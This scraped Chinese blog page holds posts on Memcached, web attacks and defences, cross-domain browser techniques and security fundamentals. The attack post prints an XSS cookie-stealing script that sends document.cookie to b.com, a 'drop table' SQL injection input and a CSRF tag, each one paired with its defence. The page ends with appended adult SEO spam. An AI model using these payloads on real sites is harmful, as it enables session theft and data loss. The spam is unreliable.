<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    不急不徐,持之以恒。

    http://blog.gopersist.com/

      BlogJava :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理 ::
      24 隨筆 :: 0 文章 :: 52 評論 :: 0 Trackbacks

    2015年4月17日 #

    互聯(lián)網(wǎng)上的應(yīng)用、網(wǎng)站,隨著用戶的增長,功能的增強(qiáng),會(huì)導(dǎo)致服務(wù)器超載,響應(yīng)變慢等問題。緩存技術(shù)是減輕服務(wù)器壓力、加快服務(wù)響應(yīng)時(shí)間、提升用戶體驗(yàn)的有效途徑。Memcached是非常流行的緩存系統(tǒng),這里介紹對Memcached的安裝、設(shè)定,以及在集群環(huán)境下的使用。

    Memcached簡介

    Memcached是一個(gè)開源、高性能、分布式的內(nèi)存緩存系統(tǒng),用于加速動(dòng)態(tài)網(wǎng)站的訪問,減輕數(shù)據(jù)庫負(fù)載。

    Memcached使用了Slab Allocator的機(jī)制分配、管理內(nèi)存,解決了內(nèi)存碎片的問題。

    Memcached雖然可以在多線程模式下運(yùn)行,但線程數(shù)通常只需設(shè)定為與CPU數(shù)量相同,這一點(diǎn)與Nginx的設(shè)定類似。

    Memcached使用

    安裝:

    在CentOS下使用下面的命令安裝:

    sudo yum install memcached 

    啟動(dòng):

    memcached -m 100 -p 11211 -d -t 2 -c 1024 -P /tmp/memcached.pid 

    -m 指定使用的內(nèi)存容量,單位MB,默認(rèn)64MB。

    -p 指定監(jiān)聽的TCP端口,默認(rèn)11211。

    -d 以守護(hù)進(jìn)程模式啟動(dòng)。

    -t 指定線程數(shù),默認(rèn)為4。

    -c 最大客戶端連接數(shù),默認(rèn)為1024。

    -P 保存PID文件。

    關(guān)閉:

    kill `cat /tmp/memcached.pid` 

    測試:

    使用telnet連接memcached服務(wù)。

    telnet localhost 11211 

    存儲(chǔ)命令格式:

    set foo 0 0 4 abcd STORED  <command name> <key> <flags> <exptime> <bytes> <data block>  <command name> set, add, replace等 <key> 關(guān)鍵字 <flags> 整形參數(shù),存儲(chǔ)客戶端對鍵值的額外信息,如值是壓縮的,是字符串,或JSON等 <exptime> 數(shù)據(jù)的存活時(shí)間,單位為秒,0表示永遠(yuǎn) <bytes> 存儲(chǔ)值的字節(jié)數(shù) <data block> 存儲(chǔ)的數(shù)據(jù)內(nèi)容 

    讀取命令格式:

    get foo VALUE foo 0 4 abcd END  <command name> <key>  <command name> get, gets。gets比get多返回一個(gè)數(shù)字,這個(gè)數(shù)字檢查數(shù)據(jù)有沒有發(fā)生變化,當(dāng)key對應(yīng)的數(shù)據(jù)改變時(shí),gets多返回的數(shù)字也會(huì)改變。 <key> 關(guān)鍵字  返回的數(shù)據(jù)格式:  VALUE <key> <flags> <bytes> 

    CAS(checked and set):

    cas foo 0 0 4 1 cdef STORED  cas <key> <flags> <exptime> <bytes> <version>  除最后的<version>外,其他參數(shù)與set, add等命令相同,<version>的值需要與gets獲取的值相同,否則無法更新。 incr, decr可對數(shù)字型數(shù)據(jù)進(jìn)行原子增減操作。 

    全局統(tǒng)計(jì)信息

    stats STAT pid 10218 STAT time 1432611519 STAT curr_connections 6 STAT total_connections 9 STAT connection_structures 7 STAT reserved_fds 10 STAT cmd_get 5 STAT cmd_set 1 STAT cmd_flush 0 STAT cmd_touch 0 STAT get_hits 3 STAT get_misses 2 STAT delete_misses 0 STAT delete_hits 0 ... END 

    Memcached集群

    Memcached本身不做任何容錯(cuò)處理,對故障節(jié)點(diǎn)的處理方式完全取決于客戶端。對Memcached的客戶端來說,不能使用普通的哈希算法(哈希取模)來尋找目標(biāo)Server,因?yàn)檫@樣在有緩存節(jié)點(diǎn)失效時(shí),會(huì)導(dǎo)致大面積緩存數(shù)據(jù)不可用。如下圖:

    當(dāng)Server3失效后,客戶端需要根據(jù)可用Server數(shù)量重新計(jì)算緩存的目標(biāo)Server,這時(shí),Key的哈希值為10的數(shù)據(jù)被指定為由Server1維護(hù),這時(shí)原本Server2上可用的緩存也無效了。

    一致性哈希算法

    一致性哈希算法解決了在動(dòng)態(tài)變化的緩存環(huán)境中,定位目標(biāo)Server的問題,通常的實(shí)現(xiàn)可將它想像成一個(gè)閉合的環(huán)形。如下圖:

    當(dāng)有節(jié)點(diǎn)失效時(shí),不會(huì)影響到正常工作的緩存服務(wù)器,只有原本分配到失效節(jié)點(diǎn)的緩存會(huì)被重新分配到下一個(gè)節(jié)點(diǎn)。如下圖:

    微信訂閱號:
    原文地址:http://blog.gopersist.com/2015/05/28/memcached/

    posted @ 2015-05-31 17:18 老林 閱讀(1576) | 評論 (2)編輯 收藏

    對于一個(gè)Web應(yīng)用來說,可能會(huì)面臨很多不同的攻擊。下面的內(nèi)容將介紹一些常見的攻擊方法,以及面對這些攻擊的防御手段。

    一、跨站腳本攻擊(XSS)

    跨站腳本攻擊的英文全稱是Cross Site Script,為了和樣式表區(qū)分,縮寫為XSS。發(fā)生的原因是網(wǎng)站將用戶輸入的內(nèi)容輸出到頁面上,在這個(gè)過程中可能有惡意代碼被瀏覽器執(zhí)行。

    跨站腳本攻擊可以分為兩種:

    1). 反射型XSS

    它是通過誘使用戶打開一個(gè)惡意鏈接,服務(wù)端將鏈接中參數(shù)的惡意代碼渲染到頁面中,再傳遞給用戶由瀏覽器執(zhí)行,從而達(dá)到攻擊的目的。如下面的鏈接:

    http://a.com/a.jsp?name=xss<script>alert(1)</script> 

    a.jsp將頁面渲染成下面的html:

    Hello xss<script>alert(1)</script> 

    這時(shí)瀏覽器將會(huì)彈出提示框。

    2). 持久型XSS

    持久型XSS將惡意代碼提交給服務(wù)器,并且存儲(chǔ)在服務(wù)器端,當(dāng)用戶訪問相關(guān)內(nèi)容時(shí)再渲染到頁面中,以達(dá)到攻擊的目的,它的危害更大。

    比如,攻擊者寫了一篇帶惡意JS代碼的博客,文章發(fā)表后,所有訪問該博客文章的用戶都會(huì)執(zhí)行這段惡意JS。

    Cookie劫持

    Cookie中一般保存了當(dāng)前用戶的登錄憑證,如果可以得到,往往意味著可直接進(jìn)入用戶帳戶,而Cookie劫持也是最常見的XSS攻擊。以上面提過的反射型XSS的例子來說,可以像下面這樣操作:

    首先誘使用戶打開下面的鏈接:

    http://a.com/a.jsp?name=xss<script src=http://b.com/b.js></script> 

    用戶打開鏈接后,會(huì)加載b.js,并執(zhí)行b.js中的代碼。b.js中存儲(chǔ)了以下JS代碼:

    var img = document.createElement("img"); img.src = "http://b.com/log?" + escape(document.cookie); document.body.appendChild(img); 

    上面的代碼會(huì)向b.com請求一張圖片,但實(shí)際上是將當(dāng)前頁面的cookie發(fā)到了b.com的服務(wù)器上。這樣就完成了竊取cookie的過程。

    防御Cookie劫持的一個(gè)簡單的方法是在Set-Cookie時(shí)加上HttpOnly標(biāo)識,瀏覽器禁止JavaScript訪問帶HttpOnly屬性的Cookie。

    XSS的防御

    1). 輸入檢查

    對輸入數(shù)據(jù)做檢查,比如用戶名只允許是字母和數(shù)字,郵箱必須是指定格式。一定要在后臺(tái)做檢查,否則數(shù)據(jù)可能繞過前端檢查直接發(fā)給服務(wù)器。一般前后端都做檢查,這樣前端可以擋掉大部分無效數(shù)據(jù)。

    對特殊字符做編碼或過濾,但因?yàn)椴恢垒敵鰰r(shí)的語境,所以可能會(huì)做不適當(dāng)?shù)倪^濾,最好是在輸出時(shí)具體情況具體處理。

    2). 輸出檢查

    對渲染到HTML中內(nèi)容執(zhí)行HtmlEncode,對渲染到JavaScript中的內(nèi)容執(zhí)行JavascriptEncode。

    另外還可以使用一些做XSS檢查的開源項(xiàng)目。

    二、SQL注入

    SQL注入常常會(huì)聽到,它與XSS類似,是由于用戶提交的數(shù)據(jù)被當(dāng)成命令來執(zhí)行而造成的。下面是一個(gè)SQL注入的例子:

    String sql = "select * from user where username = '" + username + "'"; 

    像上面的SQL語句,如果用戶提交的username參數(shù)是leo,則數(shù)據(jù)庫執(zhí)行的SQL為:

    select * from user where username = 'leo' 

    但如果用戶提交的username參數(shù)是leo’; drop table user–,那執(zhí)行的SQL為:

    select * from user where username = 'leo'; drop table user--' 

    在查詢數(shù)據(jù)后,又執(zhí)行了一個(gè)刪除表的操作,這樣的后果非常嚴(yán)重。

    SQL注入的防御

    防止SQL注入最好的方法是使用預(yù)編譯語句,如下面所示:

    String sql = "select * from user where username = ?"; PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); ResultSet results = pstmt.executeQuery(); 

    不同語言的預(yù)編譯方法不同,但基本都可以處理。

    如果遇到無法使用預(yù)編譯方法時(shí),只能像防止XSS那樣對參數(shù)進(jìn)行檢查和編碼。

    三、跨站請求偽造(CSRF)

    跨站請求偽造的英文全稱是Cross Site Request Forgery,是由于操作所需的所有參數(shù)都能被攻擊者得到,進(jìn)而構(gòu)造出一個(gè)偽造的請求,在用戶不知情的情況下被執(zhí)行。看下面一個(gè)例子:

    如果a.com網(wǎng)站需要用戶登錄后可以刪除博客,刪除博客的請求地址如下:

    GET http://a.com/blog/delete?id=1 

    當(dāng)用戶登錄a.com后,又打開了http://b.com/b.html,其中有下面的內(nèi)容:

    <img src="http://a.com/blog/delete?id=1"/> 

    這時(shí)會(huì)以用戶在a.com的身份發(fā)送http://a.com/blog/delete?id=1,刪除那篇博客。

    CSRF的防御

    1. 驗(yàn)證碼

    CSRF是在用戶不知情的情況下構(gòu)造的網(wǎng)絡(luò)情況,驗(yàn)證碼則強(qiáng)制用戶與應(yīng)用交互,所以驗(yàn)證碼可以很好得防止CSRF。但不能什么請求都加驗(yàn)證碼。

    1. referer檢查

    檢查請求header中的referer也能幫助防止CSRF攻擊,但服務(wù)器不是總能拿到referer,瀏覽器可能出于安全或隱私而不發(fā)送referer,所以也不常用。倒是圖片防盜鏈中用得很多。

    1. Anti CSRF Token

    更多的是生成一個(gè)隨機(jī)的token,在用戶提交數(shù)據(jù)的同時(shí)提交這個(gè)token,服務(wù)器端比對后如果不正確,則拒絕執(zhí)行操作。

    四、點(diǎn)擊劫持(ClickJacking)

    點(diǎn)擊劫持是從視覺上欺騙用戶。攻擊者使用一個(gè)透明的iframe覆蓋在一個(gè)網(wǎng)頁上,誘使用戶在該網(wǎng)頁上操作,而實(shí)際點(diǎn)擊卻是點(diǎn)在透明的iframe頁面。

    點(diǎn)擊劫持延伸出了很多攻擊方式,有圖片覆蓋攻擊、拖拽劫持等。

    點(diǎn)擊劫持的防御

    針對iframe的攻擊,可使用一個(gè)HTTP頭:X-Frame-Options,它有三種可選值:

    • DENY: 禁止任何頁面的frame加載;
    • SAMEORIGIN:只有同源頁面的frame可加載;
    • ALLOW-FROM:可定義允許frame加載的頁面地址。

    針對圖片覆蓋攻擊,則注意使用預(yù)防XSS的方法,防止HTML和JS注入。

    微信訂閱號:
    原文地址:http://blog.gopersist.com/2015/04/25/web-security-4/

    posted @ 2015-04-25 15:40 老林 閱讀(6290) | 評論 (2)編輯 收藏

    一、瀏覽器介紹

    對于Web應(yīng)用來說,瀏覽器是最重要的客戶端。

    目前瀏覽器五花八門多得不得了,除了Chrome、IE、Firefox、Safari、Opera這些國外的瀏覽器外,百度、騰訊、360、淘寶、搜狗、傲游之類的,反正能做的都做了。

    瀏覽器雖然這么多,但瀏覽器內(nèi)核主要就以下4種:

    1. Trident:IE使用的內(nèi)核。
    2. Gecko:Firefox使用的內(nèi)核。
    3. WebKit:Safair和Chrome使用的內(nèi)核。WebKit由蘋果發(fā)明,Chrome也用了,但是Google又開發(fā)了V8引擎替換掉了WebKit中的Javascript引擎。
    4. Presto:Opera使用的內(nèi)核。

    國內(nèi)的瀏覽器基本都是雙核瀏覽器,使用基于WebKit的內(nèi)核高速瀏覽常用網(wǎng)站,使用Trident內(nèi)核兼容網(wǎng)銀等網(wǎng)站。

    二、同源策略

    同源策略是瀏覽器最基本的安全策略,它認(rèn)為任何站點(diǎn)的內(nèi)容都是不安全的,所以當(dāng)腳本運(yùn)行時(shí),只被允許訪問來自同一站點(diǎn)的資源。

    同源是指域名、協(xié)議、端口都相同。

    如果沒有同源策略,就會(huì)發(fā)生下面這樣的問題:

    惡意網(wǎng)站用一個(gè)iframe把真實(shí)的銀行登錄頁放到他的頁面上,當(dāng)用戶使用用戶名密碼登錄時(shí),父頁面的javascript就可以讀取到銀行登錄頁表單中的內(nèi)容。

    甚至瀏覽器的1個(gè)Tab頁打開了惡意網(wǎng)站,另一個(gè)Tab頁打開了銀行網(wǎng)站,惡意網(wǎng)站中的javascript可以讀取到銀行網(wǎng)站的內(nèi)容。這樣銀行卡和密碼就能被輕易拿走。

    三、跨域訪問

    由于同源策略的原因,瀏覽器對跨域訪問做了很多限制,但有時(shí)我們的確需要做跨域訪問,那要怎么辦?主要有以下幾種情況:

    1. iframe的跨域訪問

    同域名下,父頁面可以通過document.getElementById(‘_iframe’).contentWindow.document訪問子頁面的內(nèi)容,但不同域名下會(huì)出現(xiàn)類似下面的錯(cuò)誤:

    Uncaught SecurityError: Blocked a frame with origin “http://a.com” from accessing a frame with origin “http://b.com”. Protocols, domains, and ports must match.

    有兩種解決方法:

    1). 當(dāng)主域名相同,子域名不同時(shí),比較容易解決,只需設(shè)置相同的document.domain即可。

    如http://a.a.com/a.html使用iframe載入http://b.a.com/b.html,且在a.html中有Javascript要修改b.html中元素的內(nèi)容時(shí),可以像下面的代碼那樣操作。

    a.html

    <html>
    <head>
    <script>
    document.domain = 'a.com';
    function changeIframeContent() {
    var _iframe = document.getElementById('_iframe');
    var _p = _iframe.contentWindow.document.getElementById('_p');
    _p.innerHTML = 'Content from a.html';
    }
    </script>
    </head>
    <body>
    <iframe id="_iframe" src="http://b.a.com/demo/iframe/subdomain/b.html"></iframe>
    <br>
    <input type="button" value="Change iframe content" onclick="changeIframeContent();"/>
    </body>
    </html>

    b.html

    <html>
    <head>
    <script>
    document.domain = 'a.com';
    </script>
    </head>
    <body>
    <p id="_p">b.html</p>
    </body>
    </html>

    2). 當(dāng)主域名不同時(shí),就非常麻煩了。大致的方法像下面描述的那樣:

    • a.com下有a.html;
    • a.html創(chuàng)建iframe加載b.com下的b.html,可在加載b.html時(shí)通過?或#將參數(shù)傳遞到b.html中;
    • b.html加載后,可以通過提取location.search或location.hash中的內(nèi)容獲取a.html傳過來的參數(shù);
    • b.html創(chuàng)建一個(gè)iframe,加載a.com下的c.html,并且參數(shù)也通過?或#傳給c.html;
    • 因?yàn)閏.html和a.html是相同域名,所以c.html可以使用parent.parent訪問到a.html的對象,這樣也就可以將b.html需要傳遞的參數(shù)傳回到a.html中。

    2. Ajax的跨域訪問

    Ajax主要通過XMLHttpRequest對象實(shí)現(xiàn),但是如果通過XMLHttpRequest訪問不同域名下的數(shù)據(jù),瀏覽器會(huì)出現(xiàn)類似下面的錯(cuò)誤:

    XMLHttpRequest cannot load http://b.com/demo/iframe/ajax/b.html. No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘http://a.com’ is therefore not allowed access.

    這時(shí)可由以下兩種方法解決:

    1). 使用<script>代替XMLHttpRequest,也就是JSONP的方法。利用<script>標(biāo)簽的src下加載的js不受同源策略限制,并且加載后的js運(yùn)行在當(dāng)前頁面的域下,所以可自由操作當(dāng)前頁面的內(nèi)容。

    下面的代碼演示了在a.com下的a.html通過b.com下的b.js中的內(nèi)容來更新自身的p標(biāo)簽。

    a.html

    <html>
    <head>
    <script>
    function update_p (content) {
    document.getElementById("_p").innerHTML = content;
    }
    function getFromB() {
    var _script = document.createElement("script");
    _script.type = "text/javascript";
    _script.src = "http://b.com/demo/ajax/b.js";
    document.getElementsByTagName("head")[0].appendChild(_script);
    }
    </script>
    </head>
    <body>
    <p id="_p">a.html</p>
    <input type="button" value="Get from b.com" onclick="getFromB()"/>
    </body>
    </html>

    b.js

    update_p("content from b.js"); 

    在實(shí)際使用中,通常a.html會(huì)將update_p以callback參數(shù)名傳遞給b.com的服務(wù)器,服務(wù)器動(dòng)態(tài)生成數(shù)據(jù)后,再用callback參數(shù)值包起來作為響應(yīng)回傳給a.html。

    2). 在b.com的服務(wù)器返回信息中增加以下頭信息:

    • Access-Control-Allow-Origin: http://a.com
    • Access-Control-Allow-Methods: GET

    此時(shí)瀏覽器便允許a.com讀取使用GET請求b.com的內(nèi)容。

    對于flash來說,會(huì)要求在網(wǎng)站根目錄下放一個(gè)名為crossdomain.xml的文件,以指明允許訪問的域名來源。文件中的內(nèi)容類似下面的樣子:

    <cross-domain-policy>
    <allow-access-from domain="*.a.com" />
    </cross-domain-policy>

    3. 使用HTML5的postMessage方法實(shí)現(xiàn)跨域訪問

    HTML5增加了跨文檔消息傳輸,下面的例子實(shí)現(xiàn)了使用postMessage在不同域間傳遞消息:

    a.html

    <html>
    <head>
    <script>
    function update_b () {
    var _iframe = document.getElementById("_iframe");
    _iframe.contentWindow.postMessage("content from a.html", "http://b.com");
    }
    </script>
    <head>
    <body>
    <iframe id="_iframe" src="http://b.com/demo/html5/b.html"></iframe>
    <br>
    <input type="button" value="Update b.html" onclick="update_b()"></input>
    </body>
    </html>

    b.html

    <html>
    <head>
    <script>
    window.addEventListener("message", function (event) {
    document.getElementById("_p").innerHTML = event.data;
    }, false);
    </script>
    </head>
    <body>
    <p id="_p">b.html</p>
    </body>
    </html>

    在postMessage中要指定接收方的域名,如果發(fā)現(xiàn)目標(biāo)頁面的域名不正確,將拋出類似下面這樣的錯(cuò)誤:

    Failed to execute ‘postMessage’ on ‘DOMWindow’: The target origin provided (‘http://c.com’) does not match the recipient window’s origin (‘http://b.com’).

    瀏覽器對跨域訪問的限制是出于安全考慮的,所以在使用一些方法實(shí)現(xiàn)跨域訪問時(shí)要特別小心。

    微信訂閱號:
    源文地址:http://blog.gopersist.com/2015/04/22/web-security-3/

    posted @ 2015-04-22 00:15 老林 閱讀(32131) | 評論 (6)編輯 收藏

    一、安全的要素

    信息安全的核心問題是要保障數(shù)據(jù)的合法使用者能夠在任何需要該數(shù)據(jù)時(shí)獲得保密的,沒有被非法更改過的數(shù)據(jù)。主要有以下幾要素:

    機(jī)密性

    • 保證數(shù)據(jù)內(nèi)容不能泄露。
    • 用戶的密碼用明文保存,就破壞了機(jī)密性。

    完整性

    • 保證數(shù)據(jù)內(nèi)容不被篡改。
    • 使用HTTP提交數(shù)據(jù)時(shí),數(shù)據(jù)在傳輸過程中被篡改后再發(fā)往服務(wù)器,就破壞了完整性。

    可用性

    • 保證數(shù)據(jù)可被正常訪問和使用。
    • 像拒絕服務(wù)攻擊(DoS)就是破壞了可用性。

    最基本的安全要素就上面三個(gè),下面還有一些其他的。

    可審計(jì)性

    • 記錄對數(shù)據(jù)產(chǎn)生的操作,用于日后的分析、審查。

    不可抵賴性

    • 首先要保證數(shù)據(jù)完整性,然后,在傳輸?shù)臄?shù)據(jù)中必須攜帶用于身份識別的信息,且這部分信息在不同主體間不能發(fā)生碰撞。

    加密技術(shù)的使用

    上一篇《Web安全技術(shù)(1)-對加密機(jī)制的理解》中提到了三類加密算法,可以應(yīng)用于某些要素的安全保障。如下面的說明:

    對稱加密

    • 可保障機(jī)密性,對數(shù)據(jù)加密后存儲(chǔ),可以使沒有密鑰的人員無法獲取數(shù)據(jù)內(nèi)容。

    非對稱加密

    • 可以對數(shù)據(jù)進(jìn)行加密解密操作,所以也能像對稱加密一樣保障機(jī)密性;
    • 因?yàn)榉菍ΨQ加密可以實(shí)現(xiàn)數(shù)字簽名,所以可以保證數(shù)據(jù)完整性。另外,由于是使用私鑰簽名,而私鑰只有數(shù)據(jù)發(fā)送方才有,所以如果公鑰可以驗(yàn)簽成功,則發(fā)送方不可抵賴。

    摘要加密

    • 摘要算法可保障數(shù)據(jù)完整性。

    • 在某些網(wǎng)站的軟件下載頁面里,有時(shí)除了下載地址,旁邊還會(huì)有一個(gè)MD5碼。這個(gè)MD5就是對下載的軟件做的摘要加密。在下載完成后,在本機(jī)對下載的軟件做MD5,然后和網(wǎng)站上顯示的MD5做比較,如果相同就表示軟件被成功下載,而且下載過程中軟件內(nèi)容沒有被篡改。
    • 在做系統(tǒng)時(shí),我們也經(jīng)常會(huì)對密碼做摘要加密后再保存,因?yàn)檎用艿囊粋€(gè)特性是不可逆,這樣通過數(shù)據(jù)庫中保存的加密后的密碼不可能還原成用戶的真實(shí)密碼。而用戶登錄時(shí),只需將用戶提交的密碼再做摘要加密,然后與數(shù)據(jù)庫中保存的密碼比較,就能判斷用戶有沒有輸入正確的密碼。

    二、風(fēng)險(xiǎn)分析

    對于數(shù)據(jù)可能會(huì)遇到什么威脅,一般是拍腦袋想一想,也可以使用模型幫忙,下面是一個(gè)叫STRIDE的威脅模型:

    如何評估風(fēng)險(xiǎn)?

    數(shù)據(jù)受到威脅就可能造成損失,但損失有大有小,威脅發(fā)生的概率也有高有低,我們要結(jié)合具體情況來對風(fēng)險(xiǎn)做出判斷。有一個(gè)叫DREAD的模型,可以指導(dǎo)我們?nèi)绾闻袛嗤{的風(fēng)險(xiǎn)程度。

    每一個(gè)因素都分高、中、低三個(gè)等級,權(quán)重值分別為3、2、1。

    當(dāng)有一個(gè)威脅時(shí),我們將它在每一個(gè)因素中的權(quán)重值相加,即可得出風(fēng)險(xiǎn)系數(shù)。

    假如我們對風(fēng)險(xiǎn)系數(shù)范圍的定義如下:

    高危:12~15分,中危:8~11分,低危:5~7分。

    那如果以使用明文保存密碼為例,風(fēng)險(xiǎn)系數(shù)可能像下面這樣計(jì)算:

    風(fēng)險(xiǎn) = D(3) + R(1) + E(1) + A(3) + D(1) = 9分,這就是一個(gè)中危風(fēng)險(xiǎn)。

    后續(xù)對威脅的處理,應(yīng)當(dāng)根據(jù)風(fēng)險(xiǎn)的大小和修復(fù)的難易程度做出平衡。

    微信訂閱號:
    源文地址:http://blog.gopersist.com/2015/04/17/web-security-2/

    posted @ 2015-04-17 23:47 老林 閱讀(5010) | 評論 (0)編輯 收藏

    主站蜘蛛池模板: 日本高清免费不卡视频| 免费看男人j放进女人j免费看| 成年性午夜免费视频网站不卡| 久久亚洲精品人成综合网| 国产高清不卡免费视频| 亚洲AV无码国产丝袜在线观看| 日韩精品免费视频| 久久亚洲AV无码精品色午夜 | 亚洲午夜精品久久久久久app| www.999精品视频观看免费| 亚洲人片在线观看天堂无码| 免费观看美女裸体网站| 黄色免费在线网址| 亚洲日韩精品A∨片无码| 一级毛片免费播放| 亚洲综合久久一本伊伊区| 精品久久洲久久久久护士免费| 国产精品亚洲专区一区| av在线亚洲欧洲日产一区二区| 免费a级毛片无码a∨免费软件| 久久综合亚洲色一区二区三区| 性色av免费观看| 一级日本高清视频免费观看 | 日韩人妻无码免费视频一区二区三区| 视频一区在线免费观看| 久久久亚洲精品蜜桃臀| 久久精品视频免费看| 在线aⅴ亚洲中文字幕| 亚洲JIZZJIZZ中国少妇中文| a级毛片免费全部播放| 亚洲国产成人久久三区| 四虎国产精品免费久久影院| 两个人看的www高清免费观看| 亚洲国产精品线观看不卡| 国产大片免费观看中文字幕| 国产综合免费精品久久久| 亚洲AV无码一区二区三区人| 亚洲偷自拍拍综合网| 国产精品成人观看视频免费| 一级人做人爰a全过程免费视频| 亚洲综合日韩中文字幕v在线|